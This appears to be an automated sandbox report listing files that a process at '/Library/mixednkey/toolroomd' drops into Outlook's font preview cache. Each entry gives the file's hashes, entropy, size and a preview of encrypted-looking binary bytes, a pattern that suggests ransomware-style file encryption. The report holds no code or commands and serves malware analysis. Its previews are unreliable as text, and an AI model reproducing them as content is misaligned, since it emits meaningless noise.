SHA-256:	0030DD26E2CFE7CFA02CB9EDF71F5AD1F0AB528C27179D16C0C18EBB1CBC7DF0
SHA-512:	86AC4874C53773DA413C48F2C48BCF23600E2DF62404294B8C7831711010CC132C9192FF7E825CE5DC1DCD9CD9F753FB0511A1A7690EC5F823FB6117130CDC11
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...4.T.Q.j(..g.....Y.d....ev...p...L..R)H..9..w...rh^.._\w...x..G.e..Q.o....\|<..-3.5..?d....._P.[..w........:/vS..TNK...v..../qR.X^.5...g.o..H..v[......7?..>M.[..E^.....^...X(.Y'2..m..w....s..KL...s.1.}@.W..C..H...A..&....~#....u...i..j.E..V.[k.......h.Gd....QQX.%R..:....w...'`{\|...xsCJa.....F....zL1.\|\..T...d@}..hg...h..#_.9.q..0/..=D~.....B.....f@..h.....Z.A..d...._]b..s......fA.q}.imC......jk........<.x..W0td=...a#t.m.v......P..-..y.}....9.b..i.x!.G.X&..8!\.o.;T..[.F.i....D..>I..y...Evd....j\|...#...\P......`..\|.T...h.^_.!... ....u}j.1.b..j...\|..........oba.J.4(....4_..y..X.....,..1.8...I....Mu.:.\3..K`.............z..h.G...R.5...S..Hj.....i..C...f..X......E..../W.....:.....a.,....4.K=?@.X...`U,....o.....Z>;..#.w.ni...T.4.4...(..r.Y.;F..4.<>.=...@....r...Bv..Fz.e[#.l.<v.>..A7,.ViE.A.k.s3.M.[..%:.<z.>h}.0..r.....w.-]W..Zh.k.]...a...m..r.x.<..]s5R.._".wa.E..).._c3.<,^..+.9?].........V1.J

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.ConstantiaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1474
Entropy (8bit):	7.485129241212781
Encrypted:	false
SSDEEP:	24:EuM0AX6451/QF9YVxFy5sJcb/gQbZPRfE4rpzrM0RD8MsePc0m7:EP0Aqzi85sJXq1CYdzRD8MNpq
MD5:	094F4B823A4F5BB17A8F7AD6888C5F10
SHA1:	1594A90481291C4F6486F89948B70D2CC6DC3B55
SHA-256:	206CE9F3897EB8ECEAEBCBD025C96A95655C34BC4C39885003B1C45721EE0A1E
SHA-512:	48C45A70E6D7B0C31C71BD4028A0D988D55EC93A671B5787A8A34D8A1812D2D23334A2B01C6007446CA25E1BB64E381FCD970C732965163938E0843B9AC4B72E
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.m.A..-..o+..#...\|5..-0..A......?.-.=..6.o......[...D.J....!.m..k..&D\..M.........N-.t....?7...S.1%.Z()....=.DM.....~...[d0.o.#..Y.[.F............z'....,.%U%.`..<.....U.Lx..b.yNZ_....9.7w.....dO.,.-}.d..1....+..G=..".qWLk.!..:`...k....5..5#.H..qqd.H.V:3.X.=..\|.]nc&.....4..`~?....{.IJ..F......O.HN.EL..7_.M..C...=w...g....`B._6A.<.ht.....6.O.+...T).8O......P.R.P.../....g#..Y _...}>.7s .d..F.yF/....U;...8... ..W..p-...Z..vm...4.e..7.Q$....S....lr..S..B/..,..x.....HC..b93j......\|m.#_.U....yq...:..s.@...1d.j9....vQ..A.\|J!<b...67..Q...8x@..?$..`.H.'..j.~x-.....0Iut..9.l..d.l...4._......qSOa..Qk..w..S..L...^\|...lR*5.........5.d.....ArS...J.X..s.uL.F..{2j...f.k.\H5MC..)h....?...#{..mPu... .....W.........z..a....F'l.....Za...o2J..p..Y... .q...4Oi.1....}.`.\e..E...)....?...y:..4.).T.......Z!.M..n......=........A.d..^d..K...../4...527........6V...._........h..+O..tp..t..J.m...x..m.TIN

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.CopperplateRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1722
Entropy (8bit):	7.569925967402094
Encrypted:	false
SSDEEP:	24:EkxbP2YFmeFKimTpSIKijau3u9eFSSdP8kuEbZQEB2haj/6sZ/JpcZ3csePc0m7:EmZFUijG7FFdluGZ/whcNpq
MD5:	22E1C1A922C08257945A0C90DA319701
SHA1:	D25D559A1F4E1594DAD23D43DF1E71117CB26C3D
SHA-256:	2C7239CA7E3843101767362300D290B33B7C1965AF47C4926E13620A79B27FC2
SHA-512:	5CF770454114D680B5CF98269C6C419D9FA25194BB0BA312AC3A7710FDA2CA8C0E7E8E74F91AFACDB40EA79E29C30E38F4B495694541AD672F8D0B5CF82A46CE
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a ...f\|S.\|...9..Y.?..r.!O.p.....e....Y.!.iS..ER...N~...^'.~..h._X[.Rc.nc...,.X`....jb.....han.4m~Ym...A.f.....s\..7...s\..7...s\..7...s\..7...j..?..5@<yD........,.......S...Sv.....dxzz..h@O.....u'..JIB.l.N.E.G.h.:a....?8k.....#..p ....7..j....T.,...KF>...+..`.....Ps.J.y&.Dt.x..1...\|z2.......@@...\|.#.E...T...X..........}j"....m.?..qNW..s..et1b.q......ny..~.{9_..s..Z9k.........Nr.......Yyja..;.i....v.......@.8...@...a.[..b..'.y.9..5C.@..txy.....4..q....Q. ]:..Z...X`.......oH...f.......]D{..#..D...zC.jZ[.P.......X.N....4..\|m...W{.......f......+LUSv.YV..a\]..Z.....5.\|.JV...E....%....#n......T..."W.....4LIdT._{T..6..N......H/w..G3.'..T.}..d_....="....R.Z.....\|Z........T..!x...$..Yh...+.P..uK#o.0....y.-vl..'..g....f...V>...Z..H..R.9.Ew5...-lz..'.....9.{_...x..t<....:.. ..9..vcX.#.R.7..'G....v2;.BS...~..)../#..8..........ZnH.^...Y..f.....gZ....m-8....4.C>.....i^U...T.....3......}.D....+.(...O.wvI.Rb;)

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.CorbelRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1114
Entropy (8bit):	7.25338787695322
Encrypted:	false
SSDEEP:	24:EQ5HSmsQLKczMq/Ez0Y87UZDJSJaF8XdqQXOsePc0m7:EuS3QLKMr/EYrQd4pXdfXONpq
MD5:	159FBF969528F2AFD4B71602DF51B327
SHA1:	2F45C5FD604C655854F539D2F9BF2941F7CB7C71
SHA-256:	A13161A09D94633D7639036E19844CDCCC6F496348D595779D8C5F34A4713E2B
SHA-512:	AA629CC1FBB6EF3D1971BE8B17607810BE1A51F78DF607D207EA2A5E51A236B7C17B877C0DF655AECEE58E0FFF44F0DF1881B482035411C0D11E19139D7CCC76
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.Z^..n^R.j.....o..-...G..D..^....Ew.Ox^.F.e....G..(.A0.6.!...<.2.Dl..'J..@.qq.;.....Z.....I..._3U7`k6.t.....Z...R.n.CI=/..]..[5.&.$k.YH.C..;...[......:.zp...4...L...M.'...h...c .\|n...rv.:...Q%.......I4..Sz....\....G.7&A.W..kW.......jy7.cOod.......5.8.j.Fm{......\.......e..=eb.y...Q.5....k....Y&..c{.e..y.K.........c1....!t.&'....H@.....#.u...>.[e..1..b..2.....#T._5.j...R.G...........h.....m<2\?..QjK..8...:....X..J`..:......P).wA}.-..].\|....X.r.....9...+a..y6.&....`..F..(1n.'.L.v.._OX4<....I.KX?H...r+K.,p.^........`..tn,....t.a..4=.P..])h=....J.....B...}..K....7.8... c.2\|.P.l/%wa_.?..t.L..E9..P.k.7...t..,...cf....D...J.>.8..7....:..p8..}.t...j...-..-:`..".....c....h.....8Quw..f..(..mP.pG?.l.F....U.p.;...N$.#..).................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..................................

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Cordia NewRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1522
Entropy (8bit):	7.499470577312392
Encrypted:	false
SSDEEP:	24:EWOApzBG/KGNq0jooDzOL7i4xyGebu+9LFLDGeYPkXsePc0m7:Ex2tG/5q21Dl4xyGebu8R/ckXNpq
MD5:	BAB62AE1696F1F80DC30CB26F9EB2EB8
SHA1:	F138560213D4674C662CB7C2E5646C95DC6DEA19
SHA-256:	FB9355D0178A984F6EC9FAB35AB9DD4BEEDE0E8AFCF61FB7454B10D5034EBB87
SHA-512:	F08B028D2993CE65CFE0E4D842CDC5B277A11B1DDE29B86F5DAC2B17B78659DD20A3787782EFD785A0BF78D93D7FB63E26F9A51BC260A097AC33243860F848D7
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.)E.BD..26..X....;.fDd.\|.T".SG"w..BW)..1P.l.f~3.Q...z..._......F.A.t.DF~...+R.K0...].!.V.K...Lj.qA..9z.WX+g..!.$.......'.X.7.....#...re.I.Eg.6...BT..\...w.%~C.G.....w....mX[.k..z<]..@_....,w....&.r.+t.....@......y..{.X..kd...c...(.sCXmy.{.r........y"/...W.rK .qde.}.M..9c.......7..,.Z..=..6.1..%...,".b.\Z.#..f...VF.\|m.q.OT'.v.K.{.t&....jp#.....\|.S.D....p...iE06l.:..aP..48.............65]}.;w..r.T.h...R..O..`.%...-.n..wc.h.....9vT..)_,...I.....wt.C.IG\|.hL?...ClnGT..J..D...}.\..'vb.%.?nb\...1.\...L.e.9.X..f...T...w....Y(u=`.*].ry.lg];.. ......0D....O.J9WX..+.N......5..q.e..o...Vv1.....^u..]o....^......1.}V.R.\........z.}....~y.A .....F.!C}.....+.@...W.\.7L....:@..oF...L2.>..X.-..,.....l+.6.P...........Coh.3..u..{.V..CD..jAK... v9.W....6a..f^.P...Cwq......Ipo)...L.L.F[B.8.r......p..;.h....5..(.M.......9..f.....}.KZ.._CSM...V.]j./)+q..L.w.......H#...\|2.dEY..1gU4+....1q...O.>.5.T..Z..7....:]...25B.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.CordiaUPCRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1514
Entropy (8bit):	7.512688298297739
Encrypted:	false
SSDEEP:	24:EiHwMqpFOfBwvkWym6owsK0yeC/4ZRvbwFC0QMrknVPuC5NdBIIC2TX2Zomnw1sF:EYwtkalKiC/4rUilWCnXTXBymNpq
MD5:	CD88965DB4D85BD3829C45E43656DEF6
SHA1:	983CAB946594F425311FDA1D5DC6875DC078AFCE
SHA-256:	BE03F5860637A759DC0C9CDF6E94EAE86958A6DFAE5AEABCFFCF4532FFD9E658
SHA-512:	5B74D4699B6C9D7014F4627F98527E54056AC03D9A341C0380F478DEB271A89C34FE682A5191CF349B1D7532C8A8B3EB8EFDE2A32361483C226FB6FA93215EDE
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.B\|.D.1.-.b ...s....QQU.^Z.@\|.....a&......\K......C)r.F.C..c@...n.S..LA~...z..;3wO..Ee'#ZEc]..-g.n.X..m...w.y"..I........'.X.7....#...R'R.`s....x..-L....7.4,`.0....ws.i...l...i..s...+.s.A_...Y..w...+...k.v2.6s..F].w.l... x...v%...H.TH%..F..R.WEs.........\.V...[N..T....2.K......X5%.Y.Y.A.L..+....E....9.....ek....]....Z..b<....x...?......5I....10.7...7....G....t$....%.n..)?...?L2c...06E.R.1..E..OLNo..I.3.q..ul#..p...........n........%.....>.).?.P.F..Z9J=6..b.\|e7.}({.<9.5.....W\|....\0.F...\|.,.vu..&N..y...`.-R..........\|.c.E2.8.u...k9....2K..p......Kg.L.5Aj...qM[m....-$.?......J.?.V..}'.D..fQ.8...[...@.Tp..8..D./.]}0O..p#J...q-..9..N.Q...S.S..y.:....>.F.oF...B...%ic....p.=..P.5.......NJ...~87..t..Ii{B.'.s...O...}...-.K.2..u.=..u....".G..BQ..*..q2.....o.j.c.L...<_2...@..c....4..^<.+.....'.P.R^...O....i......\|..C....c[4.S..0..n..'...s.V12..v.gj3j_"......5....].!>....=...l(.c?......%..s

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Corsiva HebrewRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1842
Entropy (8bit):	7.612388516924019
Encrypted:	false
SSDEEP:	48:EMFv+eAYK+Vo/xMx9S5vPUJW2/XVl29avuRNWfaNpq:LvwY5oJMx+UJW2/lot/u
MD5:	4FA7E16397AE899CDEB3349813329013
SHA1:	4DDA84E5ED0A931884D733B5E7E23186980A29D5
SHA-256:	13103F8FE3C1B9CEC81E1D48564A08C0B43A74C8F90262F36F0356F687ED14D3
SHA-512:	B7A481F44CC524B12C03057AEBD0EC258E29E2C1807EFCB2A6A8F123885069D19BBD40D46D2689B072EB58B218D70AC611087AA99640D51FF5AAE2580E0E81F1
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...\....W........V..f.L.?[..W..]i./r....k.C....=..c,_.. .A..\|_",..P.a..$-v...w...l...9.....F.`..X................$....1.C..s..A3&..j<F...K....X.H....F..x....Y./....S:%.D5.....E...'.......HA..B.?._.2xhN....Z[BCg...@.UZ..e.]H.....X.n..a.@....f9......I....e....^..QG..../!.Zj..7l..k8.[..'Z.[^......m.Y.....m.@.Y0..JS7zB./{.zvI"(L#....&g...)@.x..BNGL.O....Ewe.L......J.......a.A.3.....!..;6"T...Z.....9...LS..X..:...x..7.V.....<........+s..eW..YH..S ../.5....<..&X.....1.}..d~.+e.[....Ma..h.hrI..y...9J..}..S..d~....]reRT..Q.....X..}...U..b/.(..k..#!..6...........y.L..z..B.Z1.M.....]a...T..X..~....BK....:+h?...m).~x...b.....-.(jt6..."1.z%W....,R8..@_.(..w.........,.Q.....!.#L..0.....D..... ..:.........$.f..-.V...1....-.w....m...h....qP^F..Tc.R..C..l...bW..2.6_.....m..V.%.k.......a..[...%\|..~j...L..\.....p....].).zS....[...<..j.0x...KNX...;u..u.P.w.......O..d.E..g#..z.....vv..b..Z

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Courier NewRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1650
Entropy (8bit):	7.5630670968857325
Encrypted:	false
SSDEEP:	48:EBRCSvB+ik4Fc386LKNjnXY+qFXIOB7aNsOFA5PNpq:QRCSvxk4ateNjo+9Wu
MD5:	424136F898BE0BDBBE501C1BDDAF7463
SHA1:	782F05EEBCAA6094E84FC21C88E4254764AE3E32
SHA-256:	DE3F44982D32215A1E4D86E4E66D20728F85A1AB85E506493096CDDF5E212F32
SHA-512:	245F49D68BD9D4267B491F86FADED575C6218DD4AB3097AE7679C91AAF0ECD133F9A034D63CBF3011154302FE616946DDAF80AD36298B617215EA13E01F3DB33
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.aU.....>....%.;.5....O.0.....h....U...f..j.^..A.o....,...../.......n.................@...\%.4Yw....B..F.P.......8Y......e.8W..2'.......L....~.=.B2.>\|t....9.S2.=nX.+....JecIm_T...,...`..[.{El...b.z\...^...;...Xy..(.=^>GlR.E...'.A.K..f...A..N+.^g...._6..~...0..N....F......L.{.)c\|.o....0-...q.3.W....H..\./..W....."....5.0...T#st.+....:.{...v.m...9..y......XevC..$1...h..I.)"\.@.....NV.....,.!J...r.....m.~.......f.-z_..VM...1smlJ&.V..w.i".!.b.IuJ.j...6......&.A...nm... ....O.._.G...$...t.&I..B....].]..n...!@.`. %....]B8..SP..h..X...U..<S..KG......rcL.Ok..."..l:.\N....o..r).b.Q..."...Y.(.7...H.~.`.i.....C.:__b.H....?N.[.G...M..Z..B.yf..]...53...b0.Y[;-...[. zR..F.&V."P_..........E....)Uh...Z<+y.........c..dGaq.~......3v....i...n..=...a]..[.......&.KsA.96......O.....6.3],......x..)...W..k....L.......4..@..o=.....3.5_..m.... ../...@z...i v...)........b...:$........O@g..{{s..'.e#...^q4.g.q(.3....

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.CourierRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1418
Entropy (8bit):	7.492005879895833
Encrypted:	false
SSDEEP:	24:EyeC6fbVry1O+ZMLFRuRk0YVzJv+DchlofcgulROj6kyyMsePc0m7:ETCkbByc+ZonuRCzJ2cIc3RObMNpq
MD5:	B888059BAC7CE08E907497FCE746C7DE
SHA1:	3DA5BF631D479D997C9CF5094DE9A077621B2CB2
SHA-256:	B25611DE4E11BD5BCABD000FB4C48C18A702DE2330B1ECD96FA73DDD86AB71A5
SHA-512:	2505ADC89CBD5C00B2267A98FDA62CCD776BEE486FA4E6EB23EEE5EB9FFC2B65CF94CF3A22D93490B172151FFC94E6193D1DA7346665A99CEC8277DD0EB21B0B
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.aS......-.&re....p.....@..b!z...b....<.......J..J8.......`.......p......S.5K..U..=.Q.n..6..S...l..gP.!B....=....zHcX.).#w.Y..=<.:..S.h.C....Y..1......s..;...N.,........{.3..-..}.ANp..... ....?_....p!+.1..#..e.j..!.\..n....Wgw..L....vqt...gcXW.....A....y..9.!...u_U....o."..5K.........{.N_......4<.2.:n@.....g.J.Y..V.........4..&$xMp...s&.....8M.i..nH7IM.D)..^..Uo"J.q.2..?.Af...#....f^T.K\|...S6.A..X.(.....TD.x3..RF3.,..Q..%.$;Su^....2..l....<V6.......0.99w.).E?j[..y.kq.[....A...}..="..xs.4q...(..[..{.......<$.C....0.s.7.....6...i../av[!u.`..?.f...k...r[MA.4.Fb.o`..1.r.t\|.c.r/.lI..zw..^Y......#...G..0p..3.G...L...).....(.Zp.Yp....Q.1..IM./)..i...2.DA?....`..Dx.q..yA..K..w..f_..J;....WeN.L%.~7..\.2.[.C........."h.\.d....1*.....5.e!..f.%[[..2W`.]w..(.v..N;.e... ..>"B#}VR..N.7#...G.~?..._B..YR...F.S...O(......c........<.f.......~.ZX.K............J4....g.v...'.....d....D.n...

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.DIN AlternateBold.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1386
Entropy (8bit):	7.428482571974141
Encrypted:	false
SSDEEP:	24:EJjcxNky1Y06v3U83VhLDe3ycmu+D1F9qDcgL/csePc0m7:EdcxNXa0MUobD9cDC1F9qD5cNpq
MD5:	025A605F7612FF615F1797C7BA943585
SHA1:	FA15233D21897896B1A5A177D7C9F1FB0D7BB478
SHA-256:	C5E662463B4A03EF3B9CC740C5447C551FBA1B2A803D0563F570E318B6F56298
SHA-512:	A411516176C977D451A0CCC08896B745EDB35C37D27D30D6C0D616E9998282389D8DAEE9297F1B68BDB93AA505AEB1CF157C1335085DEDDAEE5AC3C6EF112338
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.aT....p..V.i..b.....e.+.../r..ZSn....C.M.Bep..7B.h...\..t.n..Y.........B...;..r.W.@.rR/..{iQ.....mC...S.....B....qP.#..........i.6\|.8.Q'\|aU..d...m.0..$.G..{..>L.)........}<.k.Hd.,&...... -..5....6{.<7Wc....2).WO$.r4.zv..:{..w...~..b=..d.3..F......$...b."...\|7...rt....y..e..T>.v2..Fv.....'...Y..U..x.`[h.l.......j.....K.X....g......4..CobY(hsY.D.....>p.t....:.<$..Q_...b.q.>.W......a.4H...F.?`...6cu...8...........\(.w.W..._..d.sY........A.......Pg......./...q>xbX._..bB.v.H..5.b....f...D....v..........n/..GX....M...a.H.....(]?..Hm........M0S.\|....L)TF/TW....J.....2R..oj..6n..}+.<Ht.O.k.2...7D@.o.<.N.L..Hem.J~...$..=.K'.....O...y.....Y.@...0s..(.Gk.\|..CL..90&....!.B..S... O0....S..t....p..V@..k;.....jo....C.bX.Z.......Y..i..}..f...2^.d.n.CNd..D....},.\~u...C.D.H.(5(...VDI............Qr.5`...w....w..+.V....g....6..7......{..;..O..<...F.V...5....X.ks.G..`.+)G...@.......!.SV."Z....Uj...0..@...'...7

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.DINCondensed Bold.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	730
Entropy (8bit):	6.750201488657607
Encrypted:	false
SSDEEP:	12:WvyOmwN/d5GmrNgGm0ftQ/bxLxNIivbxsFKT16Dq1GsewLYTc+qGm7:EN7xrNgGPK/bxxektsFbsePc0m7
MD5:	05B2598DEBA08E8CD386D78A9BFE2E7F
SHA1:	2B14230B6D1BAFEC053AD435613B301D057E5717
SHA-256:	69113CFFF43C3CB78031F666F8F9A616B5AA38E5BF33AE474A3554484FC7EF6F
SHA-512:	349FAEC55F436406502C826634999D08CBDC5CFF0B0A0F94CF60F8D64D062D44869DAE62B067CE07E592CDE044F5C5682C0C98A8CB0DB7FFE8535F7DDFE82E53
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.hy=..@;.6..=.EO.v..?..q.T.....6:.5.~.&9b......;...?bG{;(.T<)%Y.f7..:..A(pSi!....0Fu...vms.-....O.....L5B..D.@......kht.z....sn....%...u.y.bj...c.Y.=....b...d.....E.$.Pq.._...q.;..Ht._..w..[........j....+0.v..R..C.9..].EZ4.."Z.{..cY.!..0....L.vc..b......d..F2.+....y......Y....l..`c..&.....,...yOX...f(`.F..FH?8@m.{........&..o..h...w....U..u.%.X..B....................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.DamascusRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1338
Entropy (8bit):	7.427465920932228
Encrypted:	false
SSDEEP:	24:EXg9fNICp6wPzKwxHnulwhCFPGyVdRRdRHTU5QImB1GsePc0m7:Ew9xB2sHnu60FPGSrRdy+GNpq
MD5:	8FCAAD340DE937ED4475562FF833C847
SHA1:	D3220B933DEF55831BA236BD239135D84DC989DF
SHA-256:	1E195BBCB3A5244AA0026A02E0546835CAF2FF14FDA51E4E773DB3B52CB54A66
SHA-512:	D94D9B57B4581A3690DD668CB543747D84479A56F1FDF8CB2E536B09651E67757C7BE3EC7B352BEEA38A06E722EAA10BEC3D60869F16994A8E86F2EB468E41DF
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.az%..W_:../.w..q...... ......#Y.U......`>D....tw1.....:.@nEJwX..gm......@......j..I..).ld..4.s........T.h.....Vf....)...Hz1M......J.W@.'X_../...]....w.q..E..ET......=w.G.l...TK.Z...Z....u9./.?.W.. ...Z.a..H.G....5 ..R....zi....AVK..aL..C.!..c.9....h...aX.T..<#1...H5..v.g.Tg.K..2..A...B&/...T.xOEoT..i..k3..]..5..W...f.T......8!)2rm\...C3[.A.\.....M=...J...S+...d..@..y..6.......U...T.....PX...fV$Z......bx....&>..[....[.wv.r!.,...T.78$O..U....s...;.E.x.BY.ie.y=h...Y.....B.#....\&..n...Em..N.....<.[..I...(~......$..O(...n?.r._....j-...Z..&.o..7..{.B`.3...ftA.W.(...L.cq..L..P..X.......mw.v.....7$u.d.......O.b.......-(.E9+.}"[7.7..M.^....'"....Kb9.c.V.y.)./....=d..w.........=..V.....1}R*....6.~s.X..W3.(..,C.-..,.{..y...Z.......?.U...7.I....(....8.[....Bm..%.}.....C.Iin<.>...x...k......vN....5N..LG...].......=u....9-t.9..q...l~e...q...39Z.H.....D...R\|fs..SM.Q&..n.}#->%.zR...X..NKe/..@e._R.}..R.^w.)...Hz

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.DavidRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1058
Entropy (8bit):	7.1928179576143405
Encrypted:	false
SSDEEP:	24:E8Hj+cRBgmlKgoXGOnshrtrJGqNfM0wx3J2sePc0m7:E8S6gzgesrttGqNfWxQNpq
MD5:	136B98E3FC47B546C1F256FFA317ECEB
SHA1:	C43EDDBDC911FFF8BF145D403F7D07F3714D3380
SHA-256:	B6D725780ECCE2C15620F3239FEA35053BB4951A8735B1FE7930DB994D45C785
SHA-512:	660AAFBE70419823B48D2C38199BCF4533B3F3A97BF8AE861D680906AA1DC3DD7B1DD3B7493220B937CF7A6D3199EE70EA3968F38D206836068CA5079A924014
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...H...CU....0@..z._Z......ru..y.&..;.Q.1(..q.q..d^.bA).....dZ0.Lb.wU.lO...a...a+u5...6M.k.1..e.\k.....U........:.V.....FOw.w...................k.u.&y.!../g..b.k.,...Ep.........j..\|.o.2....B..yK.w.........W.P.^K#.p4)....]R.q....v6....rw..[-....a....p.;)X...u.L.(6.......KZ,..=..g.S.....k.=..v.7...L...P...e).L..Q.IX.)'(6w....%.Jz.....m........q....2ME...1w...d&.9.#u.9.`H.PA.:..R=."X..&Pj#.m.tf...\.4.@"..p..\|<<.0......$...u....B.3..../..J.7.<.y$f.t..i.4[.Ov.[....4.>b.o..=.....4.z.q..u..G...<Z.<,/.H nOF..i.R.Q.HB.y)=.I..}&.........q].X...r...1....$F...z.:..6/.,.....N.).\................Y.........6..A..AL#...c...u.N5.u.,...r[>.._jI,l...A..6.C....U..u..^O......................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..........................................................................................

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.DecoType NaskhRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1978
Entropy (8bit):	7.652690061769013
Encrypted:	false
SSDEEP:	48:C3hHos8wRhs4E7/qK6p1iSE27no0fxyi0Uz2TH3NKztCPONpq:Cxzh87/qK6fnE+o0fxAT9Kztdu
MD5:	DC4EC50FB60EF824657D6EC5A1CBBD64
SHA1:	29E46AED7ADE668E73591EE6542C9A39898DC8CB
SHA-256:	F2C444751B75F1DA04DD42EF6CD7C32989EDBEB3D60208AD4A0EB63955DE0C9F
SHA-512:	A4DF8941196BD66CC11293AD338F316A90CBBB97478478EE7037BE5A1589A266AA977F0CEC790207F2A4086C06E2452A0357123C4805BB40599F95364FF14E6F
Malicious:	false
Preview:	.<.\|.....f.A.......E@.+.Y.{.'.......=!.i .Y.aB&....W..."x3...1.&.?9......%.....e.MC...10GA)...."={Y.[..r.....TP..a.j...$......A.U.b@....~!...."..]B...........8...5.l....:.=y...........9=..&..IE.....Z..X.Z.#.\...9....W/..GaL1p.j:....h...[e.a.R.+.R.S..9.7..7.)....W..`......X.......n..>....[.nY.p........}S.......'.0.4f....>..$.....`Dr....r...g'...vD!..@..._.4...QI..O.....RQ1..^....I[X....Q.W..f3r..V......yw....x\|k.....T.}.Y....BYj..X.."E.C]V63...-Xc..... .I..$....@.+..\.k/.8fe.d,->.y9.Q.n..:...L.....T.O..8'...D.eJe~?O.....l!8....i....s0.7m.l3.5...\|.J........<WwFMe..6u.X.C(.L..}.z....Iz....f..#.;!U.6g.x.B..N.W.[..N=.Z.-.C...1..t8h.....s..%.v.....'8..@..]..m.L.A..azjY.H.A..:.L.H..N..b...)`_...Q../...G.......R..#...J.;...Y...;!...U.p...n.UWD.yG.ZN7.w.N..URp....Lsj......l9_3.......fG..8Z.:8..Dz...E......4`...SB!.S...~.]...H..^s./.w.....R...+^..d.....[.h!...2.eNSNuW.0._D[W.C^.SME...~.;n..2..i...f....od.},.XF.sC9t..\..&{..j$..2P.5..^D

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.DengXianRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1378
Entropy (8bit):	7.436769671600488
Encrypted:	false
SSDEEP:	24:EuI9n266sOBlStZ0zKPAGi23x59iJoaO2nLCPGKuPosePc0m7:EuE2vStezKPDi2v+9O2nLyzuANpq
MD5:	2B355CB166363B669A6D8021DF8B7EFC
SHA1:	71240877C77517A9BBFCD4A3E64775E5E1B4D2AF
SHA-256:	39592AAA1878F6CF2B72017BFE6977EF356806E299F2DC73FA15C5DFDF5F17F8
SHA-512:	F0769EE5CA79D50407E3D7241F24023CDBBF8ADA0F3C3022C310D8B31C00D6A71F494A8A2E737971BA0296AB55EF803150E27F60F27B9F0E1D0BF0B546847ABD
Malicious:	false
